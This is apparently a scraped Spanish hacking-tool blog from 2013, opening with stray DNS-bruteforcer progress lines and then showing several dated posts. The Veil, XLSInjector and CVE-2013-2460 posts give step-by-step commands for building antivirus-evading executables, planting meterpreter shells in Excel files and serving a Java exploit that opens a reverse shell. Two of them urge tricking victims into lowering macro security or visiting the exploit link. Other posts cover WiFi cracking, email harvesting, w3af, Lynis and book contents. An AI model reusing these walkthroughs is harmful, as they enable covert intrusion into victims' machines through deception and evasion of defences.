[*] DNS subdomain bruteforcer: 6.18% percent done...
[*] DNS subdomain bruteforcer: 6.24% percent done...
[*] DNS subdomain bruteforcer: 6.29% percent done...
[*] DNS subdomain bruteforcer: 6.34% percent done...
[*] DNS subdomain bruteforcer: 6.39% percent done...
[*] DNS subdomain bruteforcer: 6.44% percent done...
[*] DNS subdomain bruteforcer: 6.50% percent done...
[*] DNS subdomain bruteforcer: 6.55% percent done...
[*] DNS subdomain bruteforcer: 6.60% percent done...
[*] DNS subdomain bruteforcer: 6.65% percent done...
[*] DNS subdomain bruteforcer: 6.71% percent done...
[*] DNS subdomain bruteforcer: 6.76% percent done...
[*] DNS subdomain bruteforcer: 6.81% percent done...
[*] DNS subdomain bruteforcer: 6.86% percent done...
[*] DNS subdomain bruteforcer: 6.92% percent done...
[*] DNS subdomain bruteforcer: 6.97% percent done...
[*] DNS subdomain bruteforcer: 7.02% percent done...
[*] DNS subdomain bruteforcer: 7.07% percent done...
[*] DNS subdomain bruteforcer: 7.13% percent done...
[*] DNS subdomain bruteforcer: 7.18% percent done...
[*] DNS subdomain bruteforcer: 7.23% percent done...
[*] DNS subdomain bruteforcer: 7.28% percent done...
[*] DNS subdomain bruteforcer: 7.34% percent done...
[*] DNS subdomain bruteforcer: 7.39% percent done...
[*] DNS subdomain bruteforcer: 7.44% percent done...
[*] DNS subdomain bruteforcer: 7.49% percent done...


jueves, 14 de noviembre de 2013

Veil – Evasión de Antivirus


Veil – Evasión de Antivirus

Veil es una herramienta escrita en Python por Christopher Truncer para crear payloads de Metasploit capaces de evadir la mayoría de los antivirus. Utiliza métodos distintos para generar payloads diferentes y permite al usuario usar Pyinstaller o Py2Exe para convertir los payloads de Python a ejecutables.

Descarga Veil:

git clone https://github.com/ChrisTruncer/Veil
cd Veil
python Veil.py

Veil Modo de Uso
root@stuxnet:/media/Stuxnet/Pentesting/veil# python Veil.py

=========================================================================
 Veil First Run Detected... Initializing Script Setup...
=========================================================================

 [*] Executing ./config/update.py...
 [>] Please enter the path of your metasploit installation: /media/Stuxnet/Pentesting/msf
 [*] OPERATING_SYSTEM = Linux
 [*] TERMINAL_CLEAR = clear
 [*] VEIL_PATH = /media/Stuxnet/Pentesting/veil/
 [*] PAYLOAD_SOURCE_PATH = /root/veil-output/source/
 [*] Path '/root/veil-output/source/' Created
 [*] PAYLOAD_COMPILED_PATH = /root/veil-output/compiled/
 [*] Path '/ro
ot/veil-output/compiled/' Created
 [*] TEMP_DIR = /tmp/
 [*] METASPLOIT_PATH = /media/Stuxnet/Pentesting/msf
 [*] PYINSTALLER_PATH = /opt/pyinstaller-2.0/
 [*] MSFVENOM_OPTIONS = 
 [*] Configuration File Written To /media/Stuxnet/Pentesting/veil/config/settings.py

=========================================================================
 Veil | [Version]: 2.1.0
=========================================================================
 [Web]: https://www.veil-evasion.com/ | [Twitter]: @veilevasion
=========================================================================

 [!] WARNING: Official support for Kali Linux (x86) only at this time!
 [!] WARNING: Continue at your own risk!

 Main Menu

 18 payloads loaded

 Available commands:

 use          use a specific payload
 update       update Veil to the latest version
 list         list available languages/payloads
 info         information on a specific payload
 exit         exit Veil

 [>] Please enter a command: list


=========================================================================
 Veil | [Version]: 2.1.0
=========================================================================
 [Web]: https://www.veil-evasion.com/ | [Twitter]: @veilevasion
=========================================================================

 [!] WARNING: Official support for Kali Linux (x86) only at this time!
 [!] WARNING: Continue at your own risk!

 Available payloads:

 1) c/VirtualAlloc            Poor
 2) c/VoidPointer             Poor

 3) c#/VirtualAlloc           Poor
 4) c#/b64SubVirtualAlloc     Normal

 5) native/BackdoorFactory    Normal
 6) native/hyperion           Normal
 7) native/pescrambler        Normal

 8) powershell/DownloadVirtualAlloc  Excellent
 9) powershell/PsexecVirtualAlloc  Excellent
 10) powershell/VirtualAlloc   Excellent

 11) python/AESEncrypted       Excellent
 12) python/ARCEncrypted       Excellent
 13) python/Base64Encode       Excellent
 14) python/DESEncrypted       Excellent
 15) python/FlatInjection      Normal
 16) python/LetterSubstitution  Excellent
 17) python/MeterHTTPContained  Excellent
 18) python/MeterHTTPSContained  Excellent

 [>] Please enter a command: 11

=========================================================================
 Veil | [Version]: 2.1.0
=========================================================================
 [Web]: https://www.veil-evasion.com/ | [Twitter]: @veilevasion
=========================================================================

Payload: python/AESEncrypted loaded

 Required Options:

 Name   Current Value Description
 ----   ------------- -----------
 compile_to_exe   Y        Compile to an executable
 inject_method    virtual  [virtual]alloc or [void]pointer
 use_pyherion     N        Use the pyherion encrypter

 Available commands:

 set          set a specific option value
 info         show information about the payload
 help [crypters] show help menu for payload or crypters
 generate     generate payload
 exit         exit Veil
 back         go to the main menu

 [>] Please enter a command: generate 

=========================================================================
 Veil | [Version]: 2.1.0
=========================================================================
 [Web]: https://www.veil-evasion.com/ | [Twitter]: @veilevasion
=========================================================================

[?] Use msfvenom or supply custom shellcode?

  1 - msfvenom (default)
  2 - Custom

 [>] Please enter the number of your choice: 1

 [*] Press [enter] for windows/meterpreter/reverse_tcp
 [*] Press [tab] to list available payloads
 [>] Please enter metasploit payload: 
 [>] Enter value for 'LHOST', [tab] for local IP: xxx.xxx.xxx.xxx
 [>] Enter value for 'LPORT': 4444
 [>] Enter extra msfvenom options in OPTION=value syntax: 

 [*] Generating shellcode...

=========================================================================
 Veil | [Version]: 2.1.0
=========================================================================
 [Web]: https://www.veil-evasion.com/ | [Twitter]: @veilevasion
=========================================================================

 [*] Press [enter] for 'payload'
 [>] Please enter the base name for output files: 

 [?] How would you like to create your payload executable?

  1 - Pyinstaller (default)
  2 - Py2Exe

 [>] Please enter the number of your choice: 1

Seleccionamos la opción 1 y finalizamos. En este momento empieza a salir varios mensajes por consola mientras genera el ejecutable y finalmente, muestra un resumen de todo. En este se puede ver la ruta en la que ha dejado el resultado.

Ahora abrimos Metasploit:

msf> use exploit/multi/handler
msf exploit(handler) > exploit

Veil - AV Evasion


miércoles, 13 de noviembre de 2013

Gerix Wifi Cracker


Gerix Wifi Cracker

Gerix Wifi Cracker basicamente esta herramienta es una extension Visual de las tradicionales “macchanger”, “aircrack-ng”, y otras ademas que presenta un proceso automatizado de todas estas herramientas.

Requisitos:

aircrack-ng
macchanger
python-qt3

Descarga:

https://mega.co.nz/#!cp4SRTJZ!AHaFOEke7W354vTFT77iBErGbF4Wixr7qadtaUCBpBU
tar -zxvf gerix-wifi-cracker-ng.tar.gz
cd gerix-wifi-cracker-ng
python gerix.py

Tutorial Gerix Wifi Cracker


martes, 12 de noviembre de 2013

XLSInjector – Inyectar Shell Meterpreter en Archivos Excel


XLSInjector – Inyectar Shell Meterpreter en Archivos Excel

XLSInjector es una herramienta creada en perl por keith lee que permite inyectar en un archivo XLS de Microsoft Excel una consola meterpreter (ejecutando todo en la memoria ram sin crear procesos adicionales), permitiéndonos acceder a el remotamente por el puerto 4444 y tomar total control de la maquina.

Para que XLSInjector funcione adecuadamente, necesitamos lo siguiente:

    * Una Maquina (virtual o real) con Windows
    * Microsoft Excel
    * Perl
    * El modulo Win32:OLE para Perl
    * Un archivo XML a infectar
    * XLSInjector
    * y por ultimo el Metasploit Framework

Después de tener todos los elementos necesarios para el correcto funcionamiento del XLSInjector pasamos a su ejecución, que es bastante simple:

perl xlsinjector.pl -i ArchivoDeExcel.xls -o ArchivoConShellDeExcel.xls

Pero no todo es tan simple con esta herramienta, resulta que XLSInjector NO salta los filtros de scripting puestos por Microsoft en su suite ofimática, por lo que toca convencer, por medio de ingeniería social o cualquier otra técnica que el mismo usuario ponga la seguridad de las macros en baja y que “confié” en los proyectos de VB, algo complicado pero que seguro con algo de presunción se consigue que realicen estas tareas.

Suponiendo que ya se realizaron las configuraciones adecuadas para el correcto funcionamiento del XLSInjector vamos a acceder remotamente a nuestra shell meterpreter mediante la consola del Metasploit Framework

Iniciamos la consola del metasploit:

set payload windows/meterpreter/bind_tcp
set RHOST ipdelpcvictima
set RPOT 4444
exploit


lunes, 11 de noviembre de 2013

CVE-2013-2460 Java Applet ProviderSkeleton Insecure Invoke Method


CVE-2013-2460 Java Applet ProviderSkeleton Insecure Invoke Method

Java Applet ProviderSkeleton Insecure Invoke Method este módulo de Metasploit abusa el método inseguro invoke()  de la clase de ProviderSkeleton que permite para llamar a métodos estáticos arbitrarios con argumentos de usuario. La vulnerabilidad afecta a la versión Java 7u21 y versiones anteriores.

Explotando CVE-2013-2460 con mestasploit: 

msf > use exploit/multi/browser/java_jre17_provider_skeleton
msf exploit(java_jre17_provider_skeleton) > set PAYLOAD java/meterpreter/reverse_tcp
msf exploit(java_jre17_provider_skeleton) > set LHOST [IP Local]
msf exploit(java_jre17_provider_skeleton) > set srvhost [IP Local]
msf exploit(java_jre17_provider_skeleton) > set uripath /
msf exploit(java_jre17_provider_skeleton) > exploit

Ahora realizamos un poco de Ingeniería Social para enviar la dirección generada por el metasploit para hacer la sesion meterpreter.



viernes, 8 de noviembre de 2013

w3af - Open Source Web Application Security Scanner


w3af - Open Source Web Application Security Scanner

W3af es un escaner muy popular, potente y flexible para encontrar y explotar las vulnerabilidades de aplicaciones web. Es fácil de utilizar y extender y cuenta con decenas de evaluación web y plugins de explotación. En cierto modo, es como una web centrada en Metasploit.

Plataformas.

Linux (all distributions)
Microsoft Windows
Mac OS X
FreeBSD, OpenBSD, and NetBSD

Instalado w3af en ubuntu:

apt-get install python-pip

pip install clamd PyGithub GitPython pybloomfiltermmap esmre nltk pdfminer futures guess-language cluster msgpack-python python-ntlm xdot

pip install -e git+git://github.com/ramen/phply.git#egg=phply

apt-get install graphviz python-gtk2 python-glade2

pip install xdot 

Descargamos w3af:

git clone https://github.com/andresriancho/w3af.git
cd w3af
./w3af_gui

Screens:





jueves, 7 de noviembre de 2013

Lynis - The Unix / Linux auditing, security and hardening Tool


Lynis - The Unix / Linux Auditing, Security and Hardening Tool

Lynis es una herramienta de auditoría que analiza y recopila la información de los sistemas basados ​​en Unix. La audiencia de esta herramienta son la seguridad y el sistema de auditores, especialistas en redes y técnicos de mantenimiento del sistema.

Analiza el software del sistema para detectar problemas de seguridad, también buscará información general del sistema, los paquetes instalados y los errores de configuración.

Este programa tiene como objetivo ayudar en la auditoria automatizada, parches de software de gestión de vulnerabilidades y análisis de malware de los sistemas basados ​​en Unix. Se puede ejecutar sin instalación previa.

Distribuciones Admitidas:

- Debian
- CentOS
- Gentoo
- Fedora Core 4 and higher
- FreeBSD
- Arch Linux
- Knoppix
- OpenSuSE
- Mandriva 2007
- OpenBSD 4.x
- OpenSolaris
- Mac OS X
- PcBSD
- Ubuntu
- PCLinuxOS
- Red Hat, RHEL 5.x
- Slackware 12.1
- Solaris 10

Descarga:

Lynis - The Unix / Linux auditing, security and hardening Tool

tar xvzf lynis-1.3.3.tar.gz
cd lynis

Uso Básico:

root@stuxnet:/home/stuxnet/Pentesting/lynis# ./lynis --check-all

[ Lynis 1.3.0 ]

################################################################################
 Lynis comes with ABSOLUTELY NO WARRANTY. This is free software, and you are
 welcome to redistribute it under the terms of the GNU General Public License.
 See LICENSE file for details about using this software.

 Copyright 2007-2012 - Michael Boelen, http://www.rootkit.nl/
################################################################################

[+] Initializing program
------------------------------------
  - Detecting OS...                                           [ DONE ]
  - Clearing log file (/var/log/lynis.log)...                 [ DONE ]

  ---------------------------------------------------
  Program version:           1.3.0
  Operating system:          Linux
  Operating system name:     Ubuntu
  Operating system version:  12.04
  Kernel version:            3.2.0-54-generic-pae
  Hardware platform:         i686
  Hostname:                  stuxnet
  Auditor:                   [Unknown]
  Profile:                   ./default.prf
  Log file:                  /var/log/lynis.log
  Report file:               /var/log/lynis-report.dat
  Report version:            1.0
  ---------------------------------------------------

[ Press [ENTER] to continue, or [CTRL]+C to stop ]


[+] System Tools
------------------------------------
  - Scanning available tools...
  - Checking system binaries...
    - Checking /bin...                                        [ FOUND ]
    - Checking /sbin...                                       [ FOUND ]
    - Checking /usr/bin...                                    [ FOUND ]
    - Checking /usr/sbin...                                   [ FOUND ]
    - Checking /usr/local/bin...                              [ FOUND ]
    - Checking /usr/local/sbin...                             [ FOUND ]
    - Checking /usr/local/libexec...                          [ NOT FOUND ]
    - Checking /usr/libexec...                                [ NOT FOUND ]
    - Checking /usr/sfw/bin...                                [ NOT FOUND ]
    - Checking /usr/sfw/sbin...                               [ NOT FOUND ]
    - Checking /usr/sfw/libexec...                            [ NOT FOUND ]
    - Checking /opt/sfw/bin...                                [ NOT FOUND ]
    - Checking /opt/sfw/sbin...                               [ NOT FOUND ]
    - Checking /opt/sfw/libexec...                            [ NOT FOUND ]
    - Checking /usr/xpg4/bin...                               [ NOT FOUND ]
    - Checking /usr/css/bin...                                [ NOT FOUND ]
    - Checking /usr/ucb...                                    [ NOT FOUND ]

[ Press [ENTER] to continue, or [CTRL]+C to stop ]


[+] Boot and services
------------------------------------
  - Checking boot loaders
    - Checking presence GRUB2...                              [ OK ]
    - Checking presence LILO...                               [ NOT FOUND ]
    - Checking presence YABOOT...                             [ NOT FOUND ]
  - Check services at startup (rc2.d)...                      [ DONE ]
        Result: found 17 services
  - Check startup files (permissions)...                      [ OK ]

[ Press [ENTER] to continue, or [CTRL]+C to stop ]


[+] Kernel
------------------------------------
  - Checking default run level...                             [ UNKNOWN ]
  - Checking CPU support (NX/PAE)
      CPU supports PAE and NoeXecute                          [ YES ]
  - Checking kernel version                                   [ DONE ]
  - Checking kernel type                                      [ DONE ]
  - Checking loaded kernel modules                            [ DONE ]
      Found 56 active modules
  - Checking Linux kernel configuration file...               [ FOUND ]
  - Checking for available kernel update...                   [ OK ]
  - Checking core dumps configuration...                      [ ENABLED ]
    - Checking setuid core dumps configuration...             [ DISABLED ]

[ Press [ENTER] to continue, or [CTRL]+C to stop ]


[+] Memory and processes
------------------------------------
  - Checking /proc/meminfo...                                 [ FOUND ]
  - Searching for dead/zombie processes...                    [ OK ]
  - Searching for IO waiting processes...                     [ OK ]

[ Press [ENTER] to continue, or [CTRL]+C to stop ]


[+] Users, Groups and Authentication
------------------------------------
  - Search administrator accounts...                          [ OK ]
  - Checking consistency of group files (grpck)...            [ OK ]
  - Checking non unique group ID's...                         [ OK ]
  - Checking non unique group names...                        [ OK ]
  - Checking password file consistency...                     [ OK ]
  - Query system users (non daemons)...                       [ DONE ]
  - Checking NIS+ authentication support                      [ NOT ENABLED ]
  - Checking NIS authentication support                       [ NOT ENABLED ]
  - Checking sudoers file                                     [ FOUND ]
    - Check sudoers file permissions                          [ OK ]
  - Checking PAM password strength tools                      [ SUGGESTION ]
  - Checking PAM configuration files (pam.conf)               [ FOUND ]
  - Checking PAM configuration files (pam.d)                  [ FOUND ]
  - Checking PAM modules                                      [ FOUND ]
  - Checking LDAP module in PAM                               [ NOT FOUND ]
  - Checking accounts without expire date                     [ SUGGESTION ]
  - Checking user password aging                              [ DISABLED ]
  - Determining default umask
    - Checking umask (/etc/profile)                           [ SUGGESTION ]
    - Checking umask (/etc/login.defs)                        [ SUGGESTION ]
    - Checking umask (/etc/init.d/rc)                         [ SUGGESTION ]
  - Checking LDAP authentication support                      [ NOT ENABLED ]

[ Press [ENTER] to continue, or [CTRL]+C to stop ]


miércoles, 6 de noviembre de 2013

Metasploit The Penetration Tester’s Guide


Metasploit The Penetration Tester’s Guide

Metasploit es utilizado por profesionales de la seguridad en todas partes pero esta herramienta puede ser difícil de entender para los usuarios por eso al utilidad de esta guía.

Algunos de los objetivos de Metasploit The Penetration Tester’s Guide son:

Encontrar y explotar sistemas sin mantenimiento, mal configurados, y sin parches.
Realizar reconocimiento y encontrar información valiosa sobre el objetivo
Bypass de tecnologías antivirus y eludir controles de seguridad
Integrar Nmap, NeXpose, y Nessus con Metasploit para automatizar la detección
Utilizar Meterpreter para lanzar más ataques desde el interior de la red.
Conocer otros programas independientes que Metasploit, herramientas de terceros, y plug-ins.
Aprender a escribir sus propios módulos de explotación de Meterpreter y scripts.

Contenido Temático:

Chapter 1: The Absolute Basics of Penetration Testing
Chapter 2: Metasploit Basics
Chapter 3: Intelligence Gathering
Chapter 4: Vulnerability Scanning
Chapter 5: The Joy of Exploitation
Chapter 6: Meterpreter
Chapter 7: Avoiding Detection
Chapter 8: Exploitation Using Client-side Attacks
Chapter 9: Metasploit Auxiliary Modules
Chapter 10: The Social-Engineer Toolkit
Chapter 11: Fast-Track
Chapter 13: Building Your Own Module
Chapter 14: Creating Your Own Exploits
Chapter 15: Porting Exploits to the Metasploit Framework
Chapter 16: Meterpreter Scripting
Chapter 17: Simulated Penetration Test
Appendix A: Configuring Your Target Machines
Appendix B: Cheat Sheet 




martes, 5 de noviembre de 2013

Metasploit - Search Email Collector


Metasploit - Search Email Collector

Este módulo nos permite extraer todos los correos electrónicos relacionados con un dominio utilizando metasploit.

Abrimos la consola del metasploit y tecleamos:

use auxiliary/gather/search_email_collector


A continuación determinamos el dominio del cual extraeremos los email con el comando set DOMAIN “ pagina.com “, y luego corremos el módulo con el comando “ run “


Como podemos observar el módulo se a ejecutado y a extraido los email del sitio web.




lunes, 4 de noviembre de 2013

Nmap 6 Network Exploration and Security Auditing Cookbook


Nmap 6 Network Exploration and Security Auditing Cookbook

Nmap 6: Network Exploration and Security Auditing Cookbook de Paulino Calderón Pale es un excelente y específico libro sobre el uso de Nmap como herramienta indispensable en proyectos de Test de Penetración.

Contenido Temático:

Chapter 1: Nmap Fundamentals

    Introduction   
    Downloading Nmap from the official source code repository
    Compiling Nmap from source code
    Listing open ports on a remote host
    Fingerprinting services of a remote host
    Finding live hosts in your network
    Scanning using specific port ranges
    Running NSE scripts
    Scanning using a specified network interface
    Comparing scan results with Ndiff
    Managing multiple scanning profiles with Zenmap
    Detecting NAT with Nping
    Monitoring servers remotely with Nmap and Ndiff

Chapter 2: Network Exploration

    Introduction
    Discovering hosts with TCP SYN ping scans
    Discovering hosts with TCP ACK ping scans
    Discovering hosts with UDP ping scans
    Discovering hosts with ICMP ping scans
    Discovering hosts with IP protocol ping scans
    Discovering hosts with ARP ping scans
    Discovering hosts using broadcast pings
    Hiding our traffic with additional random data
    Forcing DNS resolution
    Excluding hosts from your scans
    Scanning IPv6 addresses
    Gathering network information with broadcast scripts

Chapter 3: Gathering Additional Host Information

    Introduction
    Geolocating an IP address
    Getting information from WHOIS records
    Checking if a host is known for malicious activities
    Collecting valid e-mail accounts
    Discovering hostnames pointing to the same IP address
    Brute forcing DNS records
    Fingerprinting the operating system of a host
    Discovering UDP services
    Listing protocols supported by a remote host
    Discovering stateful firewalls by using a TCP ACK scan
    Matching services with known security vulnerabilities
    Spoofing the origin IP of a port scan

Chapter 4: Auditing Web Servers

    Introduction
    Listing supported HTTP methods
    Checking if an HTTP proxy is open
    Discovering interesting files and directories in various web servers
    Brute forcing HTTP authentication
    Abusing mod_userdir to enumerate user accounts
    Testing default credentials in web applications
    Brute-force password auditing WordPress installations
    Brute-force password auditing Joomla! installations
    Detecting web application firewalls
    Detecting possible XST vulnerabilities
    Detecting Cross Site Scripting vulnerabilities in web applications
    Finding SQL injection vulnerabilities in web applications
    Detecting web servers vulnerable to slowloris denial of service attacks

Chapter 5: Auditing Databases

    Introduction
    Listing MySQL databases
    Listing MySQL users
    Listing MySQL variables
    Finding root accounts with empty passwords in MySQL servers
    Brute forcing MySQL passwords
    Detecting insecure configurations in MySQL servers
    Brute forcing Oracle passwords
    Brute forcing Oracle SID names
    Retrieving MS SQL server information
    Brute forcing MS SQL passwords
    Dumping the password hashes of an MS SQL server
    Running commands through the command shell on MS SQL servers
    Finding sysadmin accounts with empty passwords on MS SQL servers
    Listing MongoDB databases
    Retrieving MongoDB server information
    Listing CouchDB databases
    Retrieving CouchDB database statistics

Chapter 6: Auditing Mail Servers

    Introduction
    Discovering valid e-mail accounts using Google Search
    Detecting open relays
    Brute forcing SMTP passwords
    Enumerating users in an SMTP server
    Detecting backdoor SMTP servers
    Brute forcing IMAP passwords
    Retrieving the capabilities of an IMAP mail server
    Brute forcing POP3 passwords
    Retrieving the capabilities of a POP3 mail server
    Detecting vulnerable Exim SMTP servers version 4.70 through 4.75

Chapter 7: Scanning Large Networks

    Introduction
    Scanning an IP address range
    Reading targets from a text file
    Scanning random targets
    Skipping tests to speed up long scans
    Selecting the correct timing template
    Adjusting timing parameters
    Adjusting performance parameters
    Collecting signatures of web servers
    Distributing a scan among several clients using Dnmap

Chapter 8: Generating Scan Reports

    Introduction
    Saving scan results in normal format
    Saving scan results in an XML format
    Saving scan results to a SQLite database
    Saving scan results in a grepable format
    Generating a network topology graph with Zenmap
    Generating an HTML scan report
    Reporting vulnerability checks performed during a scan

Chapter 9: Writing Your Own NSE Scripts

    Introduction
    Making HTTP requests to identify vulnerable Trendnet webcams
    Sending UDP payloads by using NSE sockets
    Exploiting a path traversal vulnerability with NSE
    Writing a brute force script
    Working with the web crawling library
    Reporting vulnerabilities correctly in NSE scripts
    Writing your own NSE library
    Working with NSE threads, condition variables, and mutexes in NSE

Descargar Nmap 6 Network Exploration and Security Auditing Cookbook

Web Oficial Nmap 6 Network Exploration and Security Auditing Cookbook